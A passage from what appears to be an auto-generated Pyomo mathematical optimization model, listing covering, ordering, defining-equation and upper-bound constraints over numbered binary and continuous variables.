m.c1893 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b320 >= 1)
m.c1894 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b329 >= 1)
m.c1895 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b326 + m.b330 >= 1)
m.c1896 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b325 >= 1)
m.c1897 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b321 >= 1)
m.c1898 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b330 >= 1)
m.c1899 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b326 + m.b331 >= 1)
m.c1900 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b325 >= 1)
m.c1901 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b321 >= 1)
m.c1902 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b331 >= 1)
m.c1903 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b326 >= 1)
m.c1904 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b321 >= 1)
m.c1905 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b329 >= 1)
m.c1906 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b326 + m.b330 >= 1)
m.c1907 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b325 + m.b331 >= 1)
m.c1908 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b324 >= 1)
m.c1909 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b321 + m.b331 >= 1)
m.c1910 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b321 + m.b326 >= 1)
m.c1911 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b320 >= 1)
m.c1912 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b330 >= 1)
m.c1913 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b326 + m.b331 >= 1)
m.c1914 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b325 >= 1)
m.c1915 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b321 >= 1)
m.c1916 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b331 >= 1)
m.c1917 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b326 >= 1)
m.c1918 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b321 >= 1)
m.c1919 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b330 >= 1)
m.c1920 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b326 + m.b331 >= 1)
m.c1921 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b325 >= 1)
m.c1922 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b321 >= 1)
m.c1923 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b331 >= 1)
m.c1924 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b326 >= 1)
m.c1925 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b321 >= 1)
m.c1926 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b331 >= 1)
m.c1927 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b326 >= 1)
m.c1928 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b321 >= 1)
m.c1929 = Constraint(expr= m.b296 + m.b305 + m.b329 >= 1)
m.c1930 = Constraint(expr= m.b296 + m.b305 + m.b326 + m.b330 >= 1)
m.c1931 = Constraint(expr= m.b296 + m.b305 + m.b325 + m.b331 >= 1)
m.c1932 = Constraint(expr= m.b296 + m.b305 + m.b324 >= 1)
m.c1933 = Constraint(expr= m.b296 + m.b305 + m.b321 + m.b331 >= 1)
m.c1934 = Constraint(expr= m.b296 + m.b305 + m.b321 + m.b326 >= 1)
m.c1935 = Constraint(expr= m.b296 + m.b305 + m.b320 >= 1)
m.c1936 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b330 >= 1)
m.c1937 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b326 + m.b331 >= 1)
m.c1938 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b325 >= 1)
m.c1939 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b321 >= 1)
m.c1940 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b331 >= 1)
m.c1941 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b326 >= 1)
m.c1942 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b321 >= 1)
m.c1943 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b330 >= 1)
m.c1944 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b326 + m.b331 >= 1)
m.c1945 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b325 >= 1)
m.c1946 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b321 >= 1)
m.c1947 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b331 >= 1)
m.c1948 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b326 >= 1)
m.c1949 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b321 >= 1)
m.c1950 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b331 >= 1)
m.c1951 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b326 >= 1)
m.c1952 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b321 >= 1)
m.c1953 = Constraint(expr= m.b296 + m.b304 + m.b331 >= 1)
m.c1954 = Constraint(expr= m.b296 + m.b304 + m.b326 >= 1)
m.c1955 = Constraint(expr= m.b296 + m.b304 + m.b321 >= 1)
m.c1956 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b331 >= 1)
m.c1957 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b326 >= 1)
m.c1958 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b321 >= 1)
m.c1959 = Constraint(expr= m.b296 + m.b302 + m.b329 >= 1)
m.c1960 = Constraint(expr= m.b296 + m.b302 + m.b325 + m.b330 >= 1)
m.c1961 = Constraint(expr= m.b296 + m.b302 + m.b324 >= 1)
m.c1962 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b330 >= 1)
m.c1963 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b326 + m.b331 >= 1)
m.c1964 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b325 >= 1)
m.c1965 = Constraint(expr= m.b296 + m.b302 + m.b320 >= 1)
m.c1966 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b329 >= 1)
m.c1967 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b326 + m.b330 >= 1)
m.c1968 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b325 + m.b331 >= 1)
m.c1969 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b324 >= 1)
m.c1970 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b321 + m.b331 >= 1)
m.c1971 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b321 + m.b326 >= 1)
m.c1972 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b320 >= 1)
m.c1973 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b330 >= 1)
m.c1974 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b326 + m.b331 >= 1)
m.c1975 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b325 >= 1)
m.c1976 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b321 >= 1)
m.c1977 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b331 >= 1)
m.c1978 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b326 >= 1)
m.c1979 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b321 >= 1)
m.c1980 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b329 >= 1)
m.c1981 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b326 + m.b330 >= 1)
m.c1982 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b325 + m.b331 >= 1)
m.c1983 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b324 >= 1)
m.c1984 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b321 + m.b331 >= 1)
m.c1985 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b321 + m.b326 >= 1)
m.c1986 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b320 >= 1)
m.c1987 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b330 >= 1)
m.c1988 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c1989 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b325 >= 1)
m.c1990 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b321 >= 1)
m.c1991 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b331 >= 1)
m.c1992 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b326 >= 1)
m.c1993 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b321 >= 1)
m.c1994 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b330 >= 1)
m.c1995 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b326 + m.b331 >= 1)
m.c1996 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b325 >= 1)
m.c1997 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b321 >= 1)
m.c1998 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b331 >= 1)
m.c1999 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b326 >= 1)
m.c2000 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b321 >= 1)
m.c2001 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b331 >= 1)
m.c2002 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b326 >= 1)
m.c2003 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b321 >= 1)
m.c2004 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b330 >= 1)
m.c2005 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b326 + m.b331 >= 1)
m.c2006 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b325 >= 1)
m.c2007 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b321 >= 1)
m.c2008 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b331 >= 1)
m.c2009 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b326 >= 1)
m.c2010 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b321 >= 1)
m.c2011 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b331 >= 1)
m.c2012 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b326 >= 1)
m.c2013 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b321 >= 1)
m.c2014 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b331 >= 1)
m.c2015 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b326 >= 1)
m.c2016 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b321 >= 1)
m.c2017 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b331 >= 1)
m.c2018 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b326 >= 1)
m.c2019 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b321 >= 1)
m.c2020 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b331 >= 1)
m.c2021 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b326 >= 1)
m.c2022 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b321 >= 1)
m.c2023 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b331 >= 1)
m.c2024 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b326 >= 1)
m.c2025 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b321 >= 1)
m.c2026 = Constraint(expr= m.b296 + m.b301 + m.b331 >= 1)
m.c2027 = Constraint(expr= m.b296 + m.b301 + m.b326 >= 1)
m.c2028 = Constraint(expr= m.b296 + m.b301 + m.b321 >= 1)
m.c2029 = Constraint(expr= m.b296 + m.b299 + m.b329 >= 1)
m.c2030 = Constraint(expr= m.b296 + m.b299 + m.b326 + m.b330 >= 1)
m.c2031 = Constraint(expr= m.b296 + m.b299 + m.b325 + m.b331 >= 1)
m.c2032 = Constraint(expr= m.b296 + m.b299 + m.b324 >= 1)
m.c2033 = Constraint(expr= m.b296 + m.b299 + m.b321 + m.b331 >= 1)
m.c2034 = Constraint(expr= m.b296 + m.b299 + m.b321 + m.b326 >= 1)
m.c2035 = Constraint(expr= m.b296 + m.b299 + m.b320 >= 1)
m.c2036 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b330 >= 1)
m.c2037 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b326 + m.b331 >= 1)
m.c2038 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b325 >= 1)
m.c2039 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b321 >= 1)
m.c2040 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b330 >= 1)
m.c2041 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b326 + m.b331 >= 1)
m.c2042 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b325 >= 1)
m.c2043 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b321 >= 1)
m.c2044 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b331 >= 1)
m.c2045 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b326 >= 1)
m.c2046 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b321 >= 1)
m.c2047 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b330 >= 1)
m.c2048 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b326 + m.b331 >= 1)
m.c2049 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b325 >= 1)
m.c2050 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b321 >= 1)
m.c2051 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b330 >= 1)
m.c2052 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c2053 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b325 >= 1)
m.c2054 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b321 >= 1)
m.c2055 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b331 >= 1)
m.c2056 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b326 >= 1)
m.c2057 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b321 >= 1)
m.c2058 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b330 >= 1)
m.c2059 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b326 + m.b331 >= 1)
m.c2060 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b325 >= 1)
m.c2061 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b321 >= 1)
m.c2062 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b331 >= 1)
m.c2063 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b326 >= 1)
m.c2064 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b321 >= 1)
m.c2065 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b331 >= 1)
m.c2066 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b326 >= 1)
m.c2067 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b321 >= 1)
m.c2068 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b330 >= 1)
m.c2069 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b326 + m.b331 >= 1)
m.c2070 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b325 >= 1)
m.c2071 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b321 >= 1)
m.c2072 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b331 >= 1)
m.c2073 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b326 >= 1)
m.c2074 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b318 + m.b321 >= 1)
m.c2075 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b331 >= 1)
m.c2076 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b326 >= 1)
m.c2077 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b317 + m.b321 >= 1)
m.c2078 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b331 >= 1)
m.c2079 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b326 >= 1)
m.c2080 = Constraint(expr= m.b296 + m.b299 + m.b306 + m.b312 + m.b321 >= 1)
m.c2081 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b331 >= 1)
m.c2082 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b326 >= 1)
m.c2083 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b321 >= 1)
m.c2084 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b331 >= 1)
m.c2085 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b326 >= 1)
m.c2086 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b321 >= 1)
m.c2087 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b331 >= 1)
m.c2088 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b326 >= 1)
m.c2089 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b318 + m.b321 >= 1)
m.c2090 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b331 >= 1)
m.c2091 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b326 >= 1)
m.c2092 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b321 >= 1)
m.c2093 = Constraint(expr= m.b296 + m.b298 + m.b331 >= 1)
m.c2094 = Constraint(expr= m.b296 + m.b298 + m.b326 >= 1)
m.c2095 = Constraint(expr= m.b296 + m.b298 + m.b321 >= 1)
m.c2096 = Constraint(expr= m.b295 + m.b329 >= 1)
m.c2097 = Constraint(expr= m.b295 + m.b326 + m.b330 >= 1)
m.c2098 = Constraint(expr= m.b295 + m.b325 + m.b331 >= 1)
m.c2099 = Constraint(expr= m.b295 + m.b324 >= 1)
m.c2100 = Constraint(expr= m.b295 + m.b321 + m.b331 >= 1)
m.c2101 = Constraint(expr= m.b295 + m.b321 + m.b326 >= 1)
m.c2102 = Constraint(expr= m.b295 + m.b320 >= 1)
m.c2103 = Constraint(expr= m.b295 + m.b318 + m.b330 >= 1)
m.c2104 = Constraint(expr= m.b295 + m.b318 + m.b326 + m.b331 >= 1)
m.c2105 = Constraint(expr= m.b295 + m.b318 + m.b325 >= 1)
m.c2106 = Constraint(expr= m.b295 + m.b318 + m.b321 >= 1)
m.c2107 = Constraint(expr= m.b295 + m.b317 + m.b330 >= 1)
m.c2108 = Constraint(expr= m.b295 + m.b317 + m.b326 + m.b331 >= 1)
m.c2109 = Constraint(expr= m.b295 + m.b317 + m.b325 >= 1)
m.c2110 = Constraint(expr= m.b295 + m.b317 + m.b321 >= 1)
m.c2111 = Constraint(expr= m.b295 + m.b316 + m.b331 >= 1)
m.c2112 = Constraint(expr= m.b295 + m.b316 + m.b326 >= 1)
m.c2113 = Constraint(expr= m.b295 + m.b316 + m.b321 >= 1)
m.c2114 = Constraint(expr= m.b295 + m.b312 + m.b330 >= 1)
m.c2115 = Constraint(expr= m.b295 + m.b312 + m.b325 >= 1)
m.c2116 = Constraint(expr= m.b295 + m.b312 + m.b321 >= 1)
m.c2117 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b330 >= 1)
m.c2118 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c2119 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b325 >= 1)
m.c2120 = Constraint(expr= m.b295 + m.b312 + m.b318 + m.b321 >= 1)
m.c2121 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b331 >= 1)
m.c2122 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b326 >= 1)
m.c2123 = Constraint(expr= m.b295 + m.b312 + m.b317 + m.b321 >= 1)
m.c2124 = Constraint(expr= m.b295 + m.b311 + m.b330 >= 1)
m.c2125 = Constraint(expr= m.b295 + m.b311 + m.b326 + m.b331 >= 1)
m.c2126 = Constraint(expr= m.b295 + m.b311 + m.b325 >= 1)
m.c2127 = Constraint(expr= m.b295 + m.b311 + m.b321 >= 1)
m.c2128 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b331 >= 1)
m.c2129 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b326 >= 1)
m.c2130 = Constraint(expr= m.b295 + m.b311 + m.b318 + m.b321 >= 1)
m.c2131 = Constraint(expr= m.b295 + m.b310 + m.b331 >= 1)
m.c2132 = Constraint(expr= m.b295 + m.b310 + m.b326 >= 1)
m.c2133 = Constraint(expr= m.b295 + m.b310 + m.b321 >= 1)
m.c2134 = Constraint(expr= m.b295 + m.b306 + m.b330 >= 1)
m.c2135 = Constraint(expr= m.b295 + m.b306 + m.b326 + m.b331 >= 1)
m.c2136 = Constraint(expr= m.b295 + m.b306 + m.b325 >= 1)
m.c2137 = Constraint(expr= m.b295 + m.b306 + m.b321 >= 1)
m.c2138 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b331 >= 1)
m.c2139 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b326 >= 1)
m.c2140 = Constraint(expr= m.b295 + m.b306 + m.b318 + m.b321 >= 1)
m.c2141 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b331 >= 1)
m.c2142 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b326 >= 1)
m.c2143 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b321 >= 1)
m.c2144 = Constraint(expr= m.b295 + m.b305 + m.b331 >= 1)
m.c2145 = Constraint(expr= m.b295 + m.b305 + m.b326 >= 1)
m.c2146 = Constraint(expr= m.b295 + m.b305 + m.b321 >= 1)
m.c2147 = Constraint(expr= m.b295 + m.b302 + m.b331 >= 1)
m.c2148 = Constraint(expr= m.b295 + m.b302 + m.b326 >= 1)
m.c2149 = Constraint(expr= m.b295 + m.b302 + m.b321 >= 1)
m.c2150 = Constraint(expr= m.b295 + m.b299 + m.b331 >= 1)
m.c2151 = Constraint(expr= m.b295 + m.b299 + m.b326 >= 1)
m.c2152 = Constraint(expr= m.b295 + m.b299 + m.b321 >= 1)
m.c2153 = Constraint(expr= m.b294 + m.b331 >= 1)
m.c2154 = Constraint(expr= m.b294 + m.b326 >= 1)
m.c2155 = Constraint(expr= m.b294 + m.b321 >= 1)
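# Ordering constraints: within each consecutive run of binaries (b294..b296, b297..b299, ...)
# and for x155..x158, each variable is required to be at least as large as the next one.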
m.c2156 = Constraint(expr= m.b294 - m.b295 >= 0)
m.c2157 = Constraint(expr= m.b295 - m.b296 >= 0)
m.c2158 = Constraint(expr= m.b297 - m.b298 >= 0)
m.c2159 = Constraint(expr= m.b298 - m.b299 >= 0)
m.c2160 = Constraint(expr= m.b300 - m.b301 >= 0)
m.c2161 = Constraint(expr= m.b301 - m.b302 >= 0)
m.c2162 = Constraint(expr= m.b303 - m.b304 >= 0)
m.c2163 = Constraint(expr= m.b304 - m.b305 >= 0)
m.c2164 = Constraint(expr= m.b305 - m.b306 >= 0)
m.c2165 = Constraint(expr= m.b307 - m.b308 >= 0)
m.c2166 = Constraint(expr= m.b308 - m.b309 >= 0)
m.c2167 = Constraint(expr= m.b309 - m.b310 >= 0)
m.c2168 = Constraint(expr= m.b310 - m.b311 >= 0)
m.c2169 = Constraint(expr= m.b311 - m.b312 >= 0)
m.c2170 = Constraint(expr= m.b313 - m.b314 >= 0)
m.c2171 = Constraint(expr= m.b314 - m.b315 >= 0)
m.c2172 = Constraint(expr= m.b315 - m.b316 >= 0)
m.c2173 = Constraint(expr= m.b316 - m.b317 >= 0)
m.c2174 = Constraint(expr= m.b317 - m.b318 >= 0)
m.c2175 = Constraint(expr= m.b319 - m.b320 >= 0)
m.c2176 = Constraint(expr= m.b320 - m.b321 >= 0)
m.c2177 = Constraint(expr= m.b322 - m.b323 >= 0)
m.c2178 = Constraint(expr= m.b323 - m.b324 >= 0)
m.c2179 = Constraint(expr= m.b324 - m.b325 >= 0)
m.c2180 = Constraint(expr= m.b325 - m.b326 >= 0)
m.c2181 = Constraint(expr= m.b327 - m.b328 >= 0)
m.c2182 = Constraint(expr= m.b328 - m.b329 >= 0)
m.c2183 = Constraint(expr= m.b329 - m.b330 >= 0)
m.c2184 = Constraint(expr= m.b330 - m.b331 >= 0)
m.c2185 = Constraint(expr= m.b332 - m.b333 >= 0)
m.c2186 = Constraint(expr= m.b333 - m.b334 >= 0)
m.c2187 = Constraint(expr= m.b334 - m.b335 >= 0)
m.c2188 = Constraint(expr= m.b335 - m.b336 >= 0)
m.c2189 = Constraint(expr= m.b336 - m.b337 >= 0)
m.c2190 = Constraint(expr= m.b338 - m.b339 >= 0)
m.c2191 = Constraint(expr= m.b339 - m.b340 >= 0)
m.c2192 = Constraint(expr= m.b340 - m.b341 >= 0)
m.c2193 = Constraint(expr= m.b341 - m.b342 >= 0)
m.c2194 = Constraint(expr= m.b343 - m.b344 >= 0)
m.c2195 = Constraint(expr= m.b344 - m.b345 >= 0)
m.c2196 = Constraint(expr= m.b346 - m.b347 >= 0)
m.c2197 = Constraint(expr= m.b347 - m.b348 >= 0)
m.c2198 = Constraint(expr= m.b349 - m.b350 >= 0)
m.c2199 = Constraint(expr= m.b350 - m.b351 >= 0)
m.c2200 = Constraint(expr= m.b352 - m.b353 >= 0)
m.c2201 = Constraint(expr= m.b353 - m.b354 >= 0)
m.c2202 = Constraint(expr= m.b354 - m.b355 >= 0)
m.c2203 = Constraint(expr= m.x155 - m.x156 >= 0)
m.c2204 = Constraint(expr= m.x156 - m.x157 >= 0)
m.c2205 = Constraint(expr= m.x157 - m.x158 >= 0)
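# Defining equations: each continuous variable x121..x135 equals a constant plus a weighted
# sum of the binaries in its associated block.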
m.c2206 = Constraint(expr= m.x121 - 0.1*m.b294 - 0.573333333333333*m.b295 - 0.1*m.b296 == 1.24666666666667)
m.c2207 = Constraint(expr= m.x122 - 0.193333333333333*m.b297 - 1.14666666666667*m.b298 - 0.193333333333333*m.b299
== 2.48)
m.c2208 = Constraint(expr= m.x123 - 0.226666666666667*m.b300 - 1.36*m.b301 - 0.226666666666667*m.b302
== 2.94666666666667)
m.c2209 = Constraint(expr= m.x124 - 0.28*m.b303 - 1.42*m.b304 - 0.286666666666667*m.b305 - 0.28*m.b306
== 3.69333333333333)
m.c2210 = Constraint(expr= m.x125 - 1.91333333333333*m.b307 - 7.65333333333333*m.b308 - 1.91333333333333*m.b309
- 1.91333333333333*m.b310 - 1.91333333333333*m.b311 - 1.91333333333333*m.b312
== 24.8733333333333)
m.c2211 = Constraint(expr= m.x126 - 4.51333333333333*m.b313 - 18.0533333333333*m.b314 - 4.51333333333333*m.b315
- 4.50666666666667*m.b316 - 4.51333333333333*m.b317 - 4.51333333333333*m.b318
== 58.6666666666667)
m.c2212 = Constraint(expr= m.x127 - 0.313333333333333*m.b319 - 1.88666666666667*m.b320 - 0.313333333333333*m.b321
== 4.08)
m.c2213 = Constraint(expr= m.x128 - 2.81333333333333*m.b322 - 14.06*m.b323 - 2.80666666666667*m.b324
- 2.81333333333333*m.b325 - 2.81333333333333*m.b326 == 36.56)
m.c2214 = Constraint(expr= m.x129 - 2.56*m.b327 - 12.7933333333333*m.b328 - 2.56*m.b329 - 2.56*m.b330
- 2.55333333333333*m.b331 == 33.26)
m.c2215 = Constraint(expr= m.x130 - 1.88666666666667*m.b332 - 7.54666666666667*m.b333 - 1.88666666666667*m.b334
- 1.88666666666667*m.b335 - 1.88666666666667*m.b336 - 1.88666666666667*m.b337 == 24.52)
m.c2216 = Constraint(expr= m.x131 - 2.84*m.b338 - 14.2*m.b339 - 2.84*m.b340 - 2.84*m.b341 - 2.84666666666667*m.b342
== 36.9266666666667)
m.c2217 = Constraint(expr= m.x132 - 3.85333333333333*m.b343 - 23.1133333333333*m.b344 - 3.85333333333333*m.b345
== 50.0866666666667)
m.c2218 = Constraint(expr= m.x133 - 1.24666666666667*m.b346 - 7.47333333333333*m.b347 - 1.24*m.b348
== 16.1866666666667)
m.c2219 = Constraint(expr= m.x134 - 1.81333333333333*m.b349 - 10.8533333333333*m.b350 - 1.81333333333333*m.b351
== 23.52)
m.c2220 = Constraint(expr= m.x135 - 2.96666666666667*m.b352 - 14.82*m.b353 - 2.96*m.b354 - 2.96666666666667*m.b355
== 38.5266666666667)
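# Upper-bound constraints: each of x279..x293 may not exceed the corresponding x136..x150.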
m.c2221 = Constraint(expr= - m.x136 + m.x279 <= 0)
m.c2222 = Constraint(expr= - m.x137 + m.x280 <= 0)
m.c2223 = Constraint(expr= - m.x138 + m.x281 <= 0)
